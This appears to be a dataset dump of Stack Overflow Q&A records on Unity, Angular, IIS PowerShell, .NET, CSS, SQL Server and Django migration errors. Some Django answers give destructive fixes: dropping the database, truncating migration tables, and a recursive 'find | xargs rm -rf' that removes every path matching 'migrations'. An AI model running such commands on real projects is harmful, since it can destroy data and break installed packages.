id
stringlengths 40
40
| text
stringlengths 29
2.03k
| original_text
stringlengths 3
154k
| subdomain
stringclasses 20
values | metadata
dict |
---|---|---|---|---|
dba7576baeda4bba5199d63918f16f7ef241783e | Stackoverflow Stackexchange
Q: Installation fails when trying to install Unity AndroidPlayer on macOS I'm having trouble installing the latest version of Unity's AndroidPlayer (v5.6.1f1) on my macOS MacBook Pro (macOS version 10.12.5)
I already have Unity installed and working, but all I'm trying to do is add ability to run my games on an Android device (I have Android SDK configured and working from my previous Android App development)
I'm running the pkg file that I got from Unity called UnitySetup-Android-Support-for-Editor-5.6.1f1.pkg and go through the installation process, but after the installer begins to install the software, it fails and looking at the logs it states that PackageKit: Session UUID file exists - will not overwrite [some long path]/[filename].activeSandbox
Anyone knows what could be the problem? I've even restarted my Mac / re-downloaded the file with no avail...
A: I managed to install Android support using the full Unity3D installer and making sure that the Android support is selected. Could be a specific problem with the AndroidPlayer installation package.
| Q: Installation fails when trying to install Unity AndroidPlayer on macOS I'm having trouble installing the latest version of Unity's AndroidPlayer (v5.6.1f1) on my macOS MacBook Pro (macOS version 10.12.5)
I already have Unity installed and working, but all I'm trying to do is add ability to run my games on an Android device (I have Android SDK configured and working from my previous Android App development)
I'm running the pkg file that I got from Unity called UnitySetup-Android-Support-for-Editor-5.6.1f1.pkg and go through the installation process, but after the installer begins to install the software, it fails and looking at the logs it states that PackageKit: Session UUID file exists - will not overwrite [some long path]/[filename].activeSandbox
Anyone knows what could be the problem? I've even restarted my Mac / re-downloaded the file with no avail...
A: I managed to install Android support using the full Unity3D installer and making sure that the Android support is selected. Could be a specific problem with the AndroidPlayer installation package.
A: I managed to defeat the issue by installing the required packages from the Unity Hub, instead of manually downloading & installing.
Start Unity -> click Installs -> reveal Add Modules by clicking the vertical 3 dots and select the modules required by clicking on the checkboxes.
A: If anyone else runs into this and is unable to see the Add Modules button described in the other answer, you need to install the editor through Unity Hub in order to see that option.
I removed the old editor, went to:
https://unity3d.com/get-unity/download/archive
and then clicked the Unity Hub button for the specific version I was using. That way you're able to Add Modules :)
| stackoverflow | {
"language": "en",
"length": 279,
"provenance": "stackexchange_0000F.jsonl.gz:899864",
"question_score": "11",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651450"
} |
89603a92f5079041c795dfe6cc8ef766da7a9498 | Stackoverflow Stackexchange
Q: How do I call a function in every 10 seconds in Angular 2? How do I call a function in a set Time interval in Angular 2. I want it to be called/Triggered at specific time intervals(for eg 10 secs).
For Eg:
ts File
num: number = 0;
array: number[] = [1,5,2,4,7];
callFuntionAtIntervals(){
if(num==5){
num=0;
}
num++;
}
HTML:
<div>{{ array[num] }}</div>
So basically the div value will change at intervals
A: You may also try the traditional setInterval function.
setInterval(() => {
this.callFuntionAtIntervals();
}, 1000);
| Q: How do I call a function in every 10 seconds in Angular 2? How do I call a function in a set Time interval in Angular 2. I want it to be called/Triggered at specific time intervals(for eg 10 secs).
For Eg:
ts File
num: number = 0;
array: number[] = [1,5,2,4,7];
callFuntionAtIntervals(){
if(num==5){
num=0;
}
num++;
}
HTML:
<div>{{ array[num] }}</div>
So basically the div value will change at intervals
A: You may also try the traditional setInterval function.
setInterval(() => {
this.callFuntionAtIntervals();
}, 1000);
A: In your TS logic, define an observable based on an "interval", which will emit the values 0, 1, 2, 3, 4, 0, 1, ...
this.index = Observable.interval(10000).map(n => n % this.array.length);
In your component, unwrap that observable using async and use it to index into the array.
{{array[index | async]}}
A: Observable.interval(10000).takeWhile(() => true).subscribe(() => this.function());
infinite loop where every each 10 seconds function() is being called
A: Please check below it might be some helpful,
My requirements: Like every 5 secs need to call a service if we get back required data we need to stop calling the service and continue with next flow. Else call service again after 5 seconds.
Conditions to stop service invocation were like after max number of retries (in my case 20 times) or after certain time (in my case 120 seconds).
Note: I was using in typescript
let maxTimeToRetry = 120000; // in ms
let retryCount = 0;
let retryTimeout = 5000; // in ms
let maxRetries = 20;
const startTime = new Date().getTime();
// Need to use self inside of this, inside setInterval method;
const interval = setInterval(function () {
retryCount++; // INCREMENT RETRY COUNTER
self.service.getData(requestParams).subscribe(result => {
if (result.conditionTrue) {
clearInterval(interval); // to stop the timer or to stop further calling of service
//any execution after getting data
}
});
if ((new Date().getTime() - startTime > maxTimeToRetry) || (retryCount === maxRetries)) {
clearInterval(interval);
// any execution
}
}, retryTimeout);
| stackoverflow | {
"language": "en",
"length": 326,
"provenance": "stackexchange_0000F.jsonl.gz:899866",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651463"
} |
a466fe14ec3cb44d59e6a72f58696279f4871a70 | Stackoverflow Stackexchange
Q: list redirect destinations (URL) IIS sites I have several redirect sites configured in IIS 8.5, and I want to list them all. I've tried:
.\appcmd.exe list site * -section:system.webServer/httpRedirect
but wildcards are not working fine with appcmd. I also tried from the WebAdministration module:
Get-WebConfiguration system.webServer/httpRedirect * | Get-Member destination
but this is also not delivering what I need... which is a list with 2 columns for site & destination
A: This snippet will give you the sitenames and httpredirect destinations :
Get-Website | select name,@{name='destination';e={(Get-WebConfigurationProperty -filter /system.webServer/httpRedirect -name "destination" -PSPath "IIS:\Sites\$($_.name)").value}}
For fetching just the destinations:
(Get-WebConfigurationProperty -filter /system.webServer/httpRedirect -name "destination" -PSPath 'IIS:\Sites\*').value
| Q: list redirect destinations (URL) IIS sites I have several redirect sites configured in IIS 8.5, and I want to list them all. I've tried:
.\appcmd.exe list site * -section:system.webServer/httpRedirect
but wildcards are not working fine with appcmd. I also tried from the WebAdministration module:
Get-WebConfiguration system.webServer/httpRedirect * | Get-Member destination
but this is also not delivering what I need... which is a list with 2 columns for site & destination
A: This snippet will give you the sitenames and httpredirect destinations :
Get-Website | select name,@{name='destination';e={(Get-WebConfigurationProperty -filter /system.webServer/httpRedirect -name "destination" -PSPath "IIS:\Sites\$($_.name)").value}}
For fetching just the destinations:
(Get-WebConfigurationProperty -filter /system.webServer/httpRedirect -name "destination" -PSPath 'IIS:\Sites\*').value
A: You can refer to below function to address this issue.
Function Get-IISRedirectURLs {
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$false)][String]$SiteName
)
If ([String]::IsNullOrEmpty($SiteName)) {
Get-Website | ForEach-Object {
$SiteName = $_.Name
$prop = Get-WebConfigurationProperty -filter /system.webServer/httpRedirect -name 'destination' -PSPath "IIS:\Sites\$SiteName"
Write-Host "$SiteName`t$($prop.value)"
}
} Else {
$prop = Get-WebConfigurationProperty -filter /system.webServer/httpRedirect -name 'destination' -PSPath "IIS:\Sites\$SiteName"
Write-Host "$SiteName`t$($prop.value)"
}
}
For the complete sample archive, please download from How to list redirect destination URLs of IIS sites by PowerShell
| stackoverflow | {
"language": "en",
"length": 181,
"provenance": "stackexchange_0000F.jsonl.gz:899880",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651512"
} |
1d57dc6e43007f2faced367d859846a2d6e2adad | Stackoverflow Stackexchange
Q: Is there any guide for making KeystoneJS to work with PostgreSQL database? KeystoneJS looks like a great CMS framework, however it claims to work with MongoDB only.
Do you think it's technically feasible to make KeystoneJS support PostgreSQL with the least effort?
Is there any guide related to it?
| Q: Is there any guide for making KeystoneJS to work with PostgreSQL database? KeystoneJS looks like a great CMS framework, however it claims to work with MongoDB only.
Do you think it's technically feasible to make KeystoneJS support PostgreSQL with the least effort?
Is there any guide related to it?
| stackoverflow | {
"language": "en",
"length": 50,
"provenance": "stackexchange_0000F.jsonl.gz:899885",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651533"
} |
ba47817f99d67cdd2d2de9b9c06871e833c7181c | Stackoverflow Stackexchange
Q: Correct function using Math.random() to get 50/50 chance Which is the correct function for getting a precise 50/50 chance:
return Math.random() < 0.5;
Vs
return Math.random() <= 0.5;
A: Math.random():
The Math.random() function returns a floating-point, pseudo-random number in the range [0, 1); that is, from 0 (inclusive) up to but not including 1 (exclusive)
The random number is either in the range [0,0.5) or [0.5,1). So you should use return Math.random() < 0.5; to have a (theoretical) 50/50 chance.
| Q: Correct function using Math.random() to get 50/50 chance Which is the correct function for getting a precise 50/50 chance:
return Math.random() < 0.5;
Vs
return Math.random() <= 0.5;
A: Math.random():
The Math.random() function returns a floating-point, pseudo-random number in the range [0, 1); that is, from 0 (inclusive) up to but not including 1 (exclusive)
The random number is either in the range [0,0.5) or [0.5,1). So you should use return Math.random() < 0.5; to have a (theoretical) 50/50 chance.
A: The first one is the correct because the random number generators returns a number from 0 to 0.99999999 (depends on the exact accuracy of the generator itself)
So by splitting the values into two groups using the "<" operator, you should get two equal ranges:
[0 upto 0.49999999] and [0.5 upto 0.9999999]
| stackoverflow | {
"language": "en",
"length": 134,
"provenance": "stackexchange_0000F.jsonl.gz:899889",
"question_score": "35",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651537"
} |
784117b4f7bc3984c4c7ce93db2c7bd7c8a9ba04 | Stackoverflow Stackexchange
Q: Inspecting contents from SFSafariViewController on iPhone We have an Ionic app and are trying to make use of "embedded Safari" version for displaying web contents - SFSafariViewController.
We use cordova-plugin-browsertab plugin.
The problem is - how to debug/inspect anything from inside that embedded Safari ? In Safari, normal inspection just inspects the "root" app contents, but i cannot see anywhere any reference to the document opened with embedded safari.
| Q: Inspecting contents from SFSafariViewController on iPhone We have an Ionic app and are trying to make use of "embedded Safari" version for displaying web contents - SFSafariViewController.
We use cordova-plugin-browsertab plugin.
The problem is - how to debug/inspect anything from inside that embedded Safari ? In Safari, normal inspection just inspects the "root" app contents, but i cannot see anywhere any reference to the document opened with embedded safari.
| stackoverflow | {
"language": "en",
"length": 70,
"provenance": "stackexchange_0000F.jsonl.gz:899912",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651611"
} |
0a937d0213e742e80322ff7c60d446e67e7f73e5 | Stackoverflow Stackexchange
Q: Referencing another project in .Net Core I have 6 projects in a blank solution. I just want to reference a project to another. I have HomeController in Blog.Web projects. I want to access another project's methods like IOrganizationService in Blog.Services projects. How can I use IOrganization's method in HomeController class? For clear insight, please see picture.
Red marks show the errors....
A: It looks like you've created everything as web sites, but I suspect that most of those projects should actually be class libraries (dlls), not sites. You might need to reset a few things!
You should be able to right-click on the Dependencies node to add a project reference:
or the project node:
then:
Alternatively: edit the csproj and add a <ProjectReference> node:
| Q: Referencing another project in .Net Core I have 6 projects in a blank solution. I just want to reference a project to another. I have HomeController in Blog.Web projects. I want to access another project's methods like IOrganizationService in Blog.Services projects. How can I use IOrganization's method in HomeController class? For clear insight, please see picture.
Red marks show the errors....
A: It looks like you've created everything as web sites, but I suspect that most of those projects should actually be class libraries (dlls), not sites. You might need to reset a few things!
You should be able to right-click on the Dependencies node to add a project reference:
or the project node:
then:
Alternatively: edit the csproj and add a <ProjectReference> node:
A: Edit your MyProject.csproj file. And add a new ItemGroup or add your package into an existing ItemGroup. Here's example:
<ItemGroup>
<PackageReference Include="Polly" Version="7.2.0" />
<ProjectReference Include="..\SomeOtherProject\SomeOtherProject.csproj" />
</ItemGroup>
A: Simply upgrade your visual studio to 2022, it supports .net core up to 6.0, it is also compatible to older .net core sdk.
A: If you're doing this in Visual Studio Code, or you just want to use the CLI to accomplish the same task, you can also use the dotnet CLI command dotnet add reference [relative_path_to_project].
So for example:
dotnet add reference ../Api/MyApiProject.csproj
| stackoverflow | {
"language": "en",
"length": 219,
"provenance": "stackexchange_0000F.jsonl.gz:899916",
"question_score": "22",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651629"
} |
20b827596f83524a4994b8e65493a3c8d177b4cf | Stackoverflow Stackexchange
Q: How can i add a black layer over top of image with opacity I would like to know if there is a way i can add a black layer over my image but have it slightly transparent so you can still see the image.
I am using Bootstrap 4 & below is the code i am using including CSS :)
Any help will be much appreciated. Thank you
<div class="row">
<div class="col-md-6">
<div class="card-overlay" style="background-image: url('img/dirt1.jpg')">
<div class="white-text text-center">
<div class="card-block">
<h3>Project title</h3>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Repellat
fugiat, laboriosam, voluptatem, optio vero odio nam sit officia accusamus
minus error nisi architecto nulla ipsum dignissimos. Odit
sed qui, dolorum!.
</p>
<a class="btn btn-primary" href="...">Read More</a>
</div>
</div>
</div>
</div>
</div>
CSS:
.card-overlay {
background: rgba(0, 0, 0, 0.5);
}
A: CSS
.container { background-color: #000000;}
.container img { opacity: 0.2; }
HTML
<div class="container">
<img src="#">
</div>
Working Fiddle Example Here...
| Q: How can i add a black layer over top of image with opacity I would like to know if there is a way i can add a black layer over my image but have it slightly transparent so you can still see the image.
I am using Bootstrap 4 & below is the code i am using including CSS :)
Any help will be much appreciated. Thank you
<div class="row">
<div class="col-md-6">
<div class="card-overlay" style="background-image: url('img/dirt1.jpg')">
<div class="white-text text-center">
<div class="card-block">
<h3>Project title</h3>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Repellat
fugiat, laboriosam, voluptatem, optio vero odio nam sit officia accusamus
minus error nisi architecto nulla ipsum dignissimos. Odit
sed qui, dolorum!.
</p>
<a class="btn btn-primary" href="...">Read More</a>
</div>
</div>
</div>
</div>
</div>
CSS:
.card-overlay {
background: rgba(0, 0, 0, 0.5);
}
A: CSS
.container { background-color: #000000;}
.container img { opacity: 0.2; }
HTML
<div class="container">
<img src="#">
</div>
Working Fiddle Example Here...
A: You can use after/before for this
.card-overlay{
position: relative;
}
.card-overlay:after {
content:'';
position:absolute;
left:0px;
top:0px;
width:100%;
height:100%;
background: rgba(0, 0, 0, 0.5);
}
A: You have to put the .car-overlay div inside a div with the background. This is because if an element has a background image and a background color the background color will appear behind the background image.
.card-overlay {
background: rgba(0, 0, 0, 0.5);
}
<div class="row">
<div class="col-md-6">
<div style="background-image: url('https://placekitten.com/640/360');background-size:cover;">
<div class="card-overlay">
<div class="white-text text-center">
<div class="card-block">
<h3>Project title</h3>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Repellat fugiat, laboriosam, voluptatem, optio vero odio nam sit officia accusamus minus error nisi architecto nulla ipsum dignissimos. Odit
sed qui, dolorum!.</p>
<a class="btn btn-primary" href="...">Read More</a>
</div>
</div>
</div>
</div>
</div>
</div>
If you didn't want to change your HTML structure you could use CSS3 multiple background with a gradient rather than a background color, because you can't layer background colors.
.card-overlay {
background:
linear-gradient(
rgba(0, 0, 0, 0.5),
rgba(0, 0, 0, 0.5)
),
url('https://placekitten.com/640/360');
}
<div class="row">
<div class="col-md-6">
<div class="card-overlay">
<div class="white-text text-center">
<div class="card-block">
<h3>Project title</h3>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Repellat
fugiat, laboriosam, voluptatem, optio vero odio nam sit officia accusamus
minus error nisi architecto nulla ipsum dignissimos. Odit
sed qui, dolorum!.</p>
<a class="btn btn-primary" href="...">Read More</a>
</div>
</div>
</div>
</div>
</div>
A: try this:
.card-overlay {position:relative;}
.card-overlay:before{ background: rgba(37, 35, 35, 0.07); position: absolute; height: 100%; left: 0; top: 0; margin: 0; width: 100%; content: ' '; display: block;}
| stackoverflow | {
"language": "en",
"length": 408,
"provenance": "stackexchange_0000F.jsonl.gz:899917",
"question_score": "10",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651630"
} |
1b236822294be47d75cdb8db9c542cf79dce4109 | Stackoverflow Stackexchange
Q: Resource limit on SQL Server Linked Server I'm frequently receiving the error on a stored procedure that uses openquery to read via a linked server.
The OLE DB provider "SQLNCLI11" for linked server "BrackleyICS"
reported an error. Execution terminated by the provider because a
resource limit was reached.
This will usually happen at 10.01 minutes. This would imply a timeout setting, however on other occasions it will run fine taking 35 minutes to complete.
Has anyone encountered this?
A: You can check you current timeout settings by:
query timeout
right click server > Properties > Connections > Remote Query Timeout
login timeout
right click server > Properties > Advanced > Remote Login Timeout
I think your login timeout is set to 10 mins, you need to increase this by running below script, change value from 30 seconds to required one
sp_configure 'remote login timeout', 30
go
reconfigure with override
go
Reason why it is not timeouts every time:
Not sure but if user ids logged on to server then timeout doesn't happen.
| Q: Resource limit on SQL Server Linked Server I'm frequently receiving the error on a stored procedure that uses openquery to read via a linked server.
The OLE DB provider "SQLNCLI11" for linked server "BrackleyICS"
reported an error. Execution terminated by the provider because a
resource limit was reached.
This will usually happen at 10.01 minutes. This would imply a timeout setting, however on other occasions it will run fine taking 35 minutes to complete.
Has anyone encountered this?
A: You can check you current timeout settings by:
query timeout
right click server > Properties > Connections > Remote Query Timeout
login timeout
right click server > Properties > Advanced > Remote Login Timeout
I think your login timeout is set to 10 mins, you need to increase this by running below script, change value from 30 seconds to required one
sp_configure 'remote login timeout', 30
go
reconfigure with override
go
Reason why it is not timeouts every time:
Not sure but if user ids logged on to server then timeout doesn't happen.
A: Linked server has also its own Query Timeout setting in Linked Server->Properties->Server Options. It is likely it is set to 0 - which is default value.
In this case it is using Query Wait advanced server setting - which again - most likely is set to -1 (default).
In this case timeout is decided per query and it is calculated as 25 times of estimated query cost.
More info in MSDN
A:
EXEC sys.sp_configure N'remote query timeout (s)', N'1800'
GO
RECONFIGURE WITH OVERRIDE
GO
The default value is 600 s which is equal to 10 min
| stackoverflow | {
"language": "en",
"length": 270,
"provenance": "stackexchange_0000F.jsonl.gz:899929",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651672"
} |
f6eb374e6e8619b957a2be639a7d6d5fa07c81b5 | Stackoverflow Stackexchange
Q: django.db.migrations.exceptions.InconsistentMigrationHistory When I run python manage.py migrate on my Django project, I get the following error:
Traceback (most recent call last):
File "manage.py", line 22, in <module>
execute_from_command_line(sys.argv)
File "/home/hari/project/env/local/lib/python2.7/site- packages/django/core/management/__init__.py", line 363, in execute_from_command_line
utility.execute()
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/__init__.py", line 355, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/base.py", line 283, in run_from_argv
self.execute(*args, **cmd_options)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/base.py", line 330, in execute
output = self.handle(*args, **options)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/commands/migrate.py", line 86, in handle
executor.loader.check_consistent_history(connection)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/db/migrations/loader.py", line 298, in check_consistent_history
connection.alias,
django.db.migrations.exceptions.InconsistentMigrationHistory: Migration admin.0001_initial is applied before its dependency account.0001_initial on database 'default'.
I have a user model like below:
class User(AbstractUser):
place = models.CharField(max_length=64, null=True, blank=True)
address = models.CharField(max_length=128, null=True, blank=True)
How can I solve this problem?
A: Solved by commenting app admin before migration in settings.py
django.contrib.admin
and in urls.py,
('admin/', admin.site.urls)
uncomment after migrate
| Q: django.db.migrations.exceptions.InconsistentMigrationHistory When I run python manage.py migrate on my Django project, I get the following error:
Traceback (most recent call last):
File "manage.py", line 22, in <module>
execute_from_command_line(sys.argv)
File "/home/hari/project/env/local/lib/python2.7/site- packages/django/core/management/__init__.py", line 363, in execute_from_command_line
utility.execute()
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/__init__.py", line 355, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/base.py", line 283, in run_from_argv
self.execute(*args, **cmd_options)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/base.py", line 330, in execute
output = self.handle(*args, **options)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/commands/migrate.py", line 86, in handle
executor.loader.check_consistent_history(connection)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/db/migrations/loader.py", line 298, in check_consistent_history
connection.alias,
django.db.migrations.exceptions.InconsistentMigrationHistory: Migration admin.0001_initial is applied before its dependency account.0001_initial on database 'default'.
I have a user model like below:
class User(AbstractUser):
place = models.CharField(max_length=64, null=True, blank=True)
address = models.CharField(max_length=128, null=True, blank=True)
How can I solve this problem?
A: Solved by commenting app admin before migration in settings.py
django.contrib.admin
and in urls.py,
('admin/', admin.site.urls)
uncomment after migrate
A: Your django_migrations table in your database is the cause of inconsistency and deleting all the migrations just from local path won't work.
You have to truncate the django_migrations table from your database and then try applying the migrations again. It should work but if it does not then run makemigrations again and then migrate.
Note: don't forget to take a backup of your data.
A: This happened to me in a new project after I added a custom User model, per the recommendation in the django docs.
If you’re starting a new project, it’s highly recommended to set up a custom user model, even if the default User model is sufficient for you.
Here is what I did to solve the problem.
*
*Delete the database db.sqlite3.
*Delete the app/migrations folder.
Per @jackson, temporarily comment out django.contrib.admin.
INSTALLED_APPS = [
...
#‘django.contrib.admin’,
...
]
Also comment out the admin site in urls.py:
urlpatterns = [
path('profile/', include('restapp.urls')),
#path('admin/', admin.site.urls),
]
If you don't comment out the path('admin/'), you will get error "LookupError: No installed app with label 'admin'" when you run
python manage.py migrate
After the migrations finish, uncomment both of the above.
A: Here how to solve this properly.
Follow these steps in your migrations folder inside the project:
*
*Delete the _pycache_ and the 0001_initial files.
*Delete the db.sqlite3 from the root directory (be careful all your data will go away).
*on the terminal run:
*python manage.py makemigrations
python manage.py migrate
Voila.
A: Just delete all the migrations folders, __pycache__, .pyc files:
find . | grep -E "(__pycache__|\.pyc|\.pyo$|migrations)" | xargs rm -rf
then, run:
python manage.py makemigrations
python manage.py migrate
A: When you are doing some changes to default user model or you are making a custom user model by abstractuser then lot of times you will face that error
1: Remember when we create a superuser then for logging in we need username and password but if you converted USERNAME_FIELD = 'email' then now you can't login with username and password because your username field is converted into email....
and if you try to make another superuser then it will not ask for username it will only ask for email and password and then after creating superuser by email and password only when you try to login in admin pannel then it will throw that error because there is not any username and username field is required
2: That's why after creating custom user model during migrate it will throw error so for
resolving it first add AUTH_USER_MODEL = 'appname.custommodelname' (appname is the app name where you definded your custom user model and custom model name is the name of the model which you gave to your custom user model) in your settings.py
3: Then delete the migrations folder of that app where you created that custom user model then delete the database db.sqlite3 of the project
4: Now run migrations python manage.py makemigrations appname(that app name where you defined your custom user model)
5: Then Migrate it by python manage.py migrate
6: That's it Now it is Done
A: Problem
django.db.migrations.exceptions.InconsistentMigrationHistory: Migration admin.0001_initial is applied before its dependency account.0001_initial on database 'default'.
So we can migrate database without admin(admin.0001_initial) firstly.
After its dependency migrated, execute commands to migrate admin.0001_initial.
Solution
*
*remove 'django.contrib.admin' from INSTALLED_APPS in settings.py.
*execute commands:
Python manage.py makemigrations appname
Python manage.py migrate appname
*add 'django.contrib.admin' to INSTALLED_APPS in settings.py file.
*execute commands again:
Python manage.py makemigrations appname
Python manage.py migrate appname
A: In my case the problem was with pytest starting, where I just altered --reuse-db to --create-db, run pytest, and changed it back. This fixed my problem
A: You can delete directly db.sqlite3, then migrate a new database is automatically generated. It should fix it.
rm sqlite3.db
python manage.py makemigrations
python manage.py migrate
A: just delete the sqlite file or run flush the databse 'python manage.py flush'
and then run makemigrations and migrate commands respectively.
A: when you create a new Django project and run
python manage.py migrate
The Django will create 10 tables for you by default including one auth_user table and two start with auth_user.
when you want to create a custom user model inherit from AbstractUser, you will encounter this problem with error message as follow:
django.db.migrations.exceptions.InconsistentMigrationHistory: Migration admin.0001_initial is applied before its dependency account.0001_initial on database 'default'.
I solve this problem by dropping my entire database, and create a new one. And this replaced the three tables I mentioned.
A: Your Error is essentially:
Migration "B" is applied before its dependency "A" on database 'default'.
Sanity Check: First, open your database and look at the records in the 'django_migrations' table. Records should be listed in Chronological order (ex: A,B,C,D...).
Make sure that the name of the "A" Migration listed in the error matches the name of the "A" migration listed in the database. (They can differ if you had previously, manually, edited or deleted or renamed migration files)
To Fix This, rename migration A. either in the database or rename the filename. BUT make sure the changes matches up with what other developers on your team have in their databases (or the changes matches what on your production database)
A: The order of INSTALLED_APPS seems important.
If you always put your recent works on top/beginning of the list they'll always be loaded properly in regard to django.contrib.admin. Moving my works to the beginning of the INSTALLED_APPS list fixed this problem for me.
The reason Kun Shi's solution may have worked maybe it ran the migrations in a different order.
A: Since you are using a custom User model, you can do 4 steps:
*
*Comment out django.contrib.admin in your INSTALLED_APPS settings
INSTALLED_APPS = [
...
#'django.contrib.admin',
...
]
*Comment out admin path in urls.py
urlpatterns = [
...
#path('admin/', admin.site.urls)
...
]
*Then run
python manage.py migrate
*When done, uncomment all back
A: Lets start off by addressing the issue with most of the answers on this page:
You never have to drop your database if you are using Django's migration system correctly and you should never delete migrations once they are comitted
Now the best solution for you depends on a number of factors which include how experienced you are with Django, what level of understanding you have of the migration system, and how valuable the data in your database is.
In short there are two ways you can address any migration error.
*
*Take the nuclear option. Warning: this is only an option if you are working alone. If other people depend on existing migrations you cannot just delete them.
*
*Delete all of your migrations, and rebuild a fresh set with python3 -m manage makemigrations. This should remove any problems you had with dependencies or inconsistencies in your migrations.
*Drop your entire database. This will remove any problems you had with inconsistencies you had between your actual database schema and the schema you should have based on your migration history, and will remove any problems you had with inconsistencies between your migration history and your previous migration files [this is what the InconsistentMigrationHistory is complaining about].
*Recreate your database schema with python3 -m manage migrate
*Determine the cause of the error and resolve it, because (speaking from experience) the cause is almost certainly something silly you did. (Generally as a result of not understanding how to use the migration system correctly). Based on the error's I've caused there are three categories.
*
*Inconsistencies with migration files. This is a pretty common one when multiple people are working on a project. Hopefully your changes do not conflict and makemigrations --merge can solve this one, otherwise someone is going to have to roll back their migrations to the branching point in order to resolve this.
*Inconsistencies between your schema and your migration history. To manage this someone will have either edited the database schema manually, or deleted migrations. If they deleted a migration, then revert their changes and yell at them; you should never delete migrations if others depend on them. If they edited the database schema manually, revert their changes and then yell at them; Django is managing the database schema, no one else.
*Inconsistencies between your migration history and your migrations files. [This is the InconsistentMigrationHistory issue the asker suffers from, and the one I suffered from when I arrived at this page]. To manage this someone has either manually messed with the django_migrations table or deleted a migration after it was applied. To resolve this you are going to have to work out how the inconsistency came about and manually resolve it. If your database schema is correct, and it is just your migration history that is wrong you can manually edit the django_migrations table to resolve this. If your database schema is wrong then you will also have to manually edit that to bring it in line with what it should be.
Based on your description of the problem and the answer you selected I'm going to assume you are working alone, are new to Django, and don't care about your data. So the nuclear option may be right for you.
If you are not in this situation and the above text looks like gibberish, then I suggest asking the Django User's Mailing List for help. There are very helpful people there who can help walk you through resolving the specific mess you are in.
Have faith, you can resolve this error without going nuclear!
A: Before performing any other steps, back up your database. Then back it up again.
Remove any custom user model code out of the way, disable your custom model and app in settings, then:
python manage.py dumpdata auth --natural-primary --natural-foreign > auth.json
python manage.py migrate auth zero # This will also revert out the admin migrations
Then add in your custom model, set it in settings, and re-enable the app. Make sure you have no migrations on this app yet.
Then:
python manage.py makemigrations <your-app>
python manage.py migrate
python manage.py loaddata auth.json # Assumes your user-model isn't TOO dissimilar to the standard one.
Done!
A: There is another reason besides user error that can lead to this sort of problem: a known issue with Django when it comes to squashed migrations.
We have a series of migrations that work perfectly fine in Python 2.7 + Django 1.11. Running makemigrations or migrate always works as it should, etc., even (for the purpose of testing) when the database is freshly re-created.
However, as we move a project to Python 3.6 (currently using the same Django 1.11) I've been stuck trying to figure out why the same migrations apply just fine only the first time they are run. After that, any attempt to run makemigrations or even just migrate results in the error:
django.db.migrations.exceptions.InconsistentMigrationHistory
wherein migration foo.0040-thing is applied before its dependency foo.0038-something-squashed-0039-somethingelse (we only happen to have that one squashed migration... the rest are much more straightforward).
What's bugged me for a while is why this only happens on Python 3. If the DB is truly inconsistent this should be happening all the time. That the migrations appear to work perfectly fine the first time they are applied was equally confounding.
After much searching (including the present Q&A thread), I stumbled upon the aforementioned Django bug report. Our squash migration did indeed use the b prefix in the replaces line (e.g., replaces = [(b'', 'foo.0038-defunct'),.......]
Once I removed the b prefixes from the replaces line it all worked normally.
A: If you are working on an empty database a quick fix could be running the migrations for the account app, before any other app migrations.
$ ./manage.py migrate account
And then:
$ ./manage.py migrate
A: How to fix (Without delete migration folder or entire database)
*
*Backup your database
*Comment out your app in INSTALLED_APPS and AUTH_USER_MODEL = 'account.User' in your settings.py
*python manage.py admin zero
*Undo step 2
*python manage.py migrate
Why this problem occured?
django admin app depends on AUTH_USER_MODEL which is default auth model when you create your django project.
If you migrate project models before change the AUTH_USER_MODEL, django admin app apply migration as django auth model dependency. However, you change that dependency and want to migrate models again. So, the problem is occured here; admin models applied before its dependency, which is your User model now, applied. Thus, You should revert admin models migrations and then try it again.
A: First delete all the migrations and db.sqlite3 files and follow these steps:
$ ./manage.py makemigrations myapp
$ ./manage.py squashmigrations myapp 0001(may be differ)
Delete the old migration file and finally.
$ ./manage.py migrate
A: If that exception was reveal itself while you are trying to create your own User model instead of standard follow that instruction
I have found my problem resolve by follow that instruction step by step:
*
*Create a custom user model identical to auth.User, call it User (so
many-to-many tables keep the same name) and set db_table='auth_user'
(so it uses the same table)
*Throw away all your migrations
*Recreate a fresh set of migrations
*Sacrifice a chicken, perhaps two if you're anxious; also make a backup of your database
*Truncate the django_migrations table
*Fake-apply the new set of migrations
*Unset db_table, make other changes to the custom model, generate migrations, apply them
It is highly recommended to do this on a database that enforces
foreign key constraints. Don't try this on SQLite on your laptop and
expect it to work on Postgres on the servers!
A: If you set AUTH_USER_MODEL in settings.py like this:
AUTH_USER_MODEL = 'custom_user_app_name.User'
you should comment this line before run makemigration and migrate commands. Then you can uncomment this line again.
A: when you create a new project and with no apps, you run the
python manage.py migrate
the Django will create 10 tables by default.
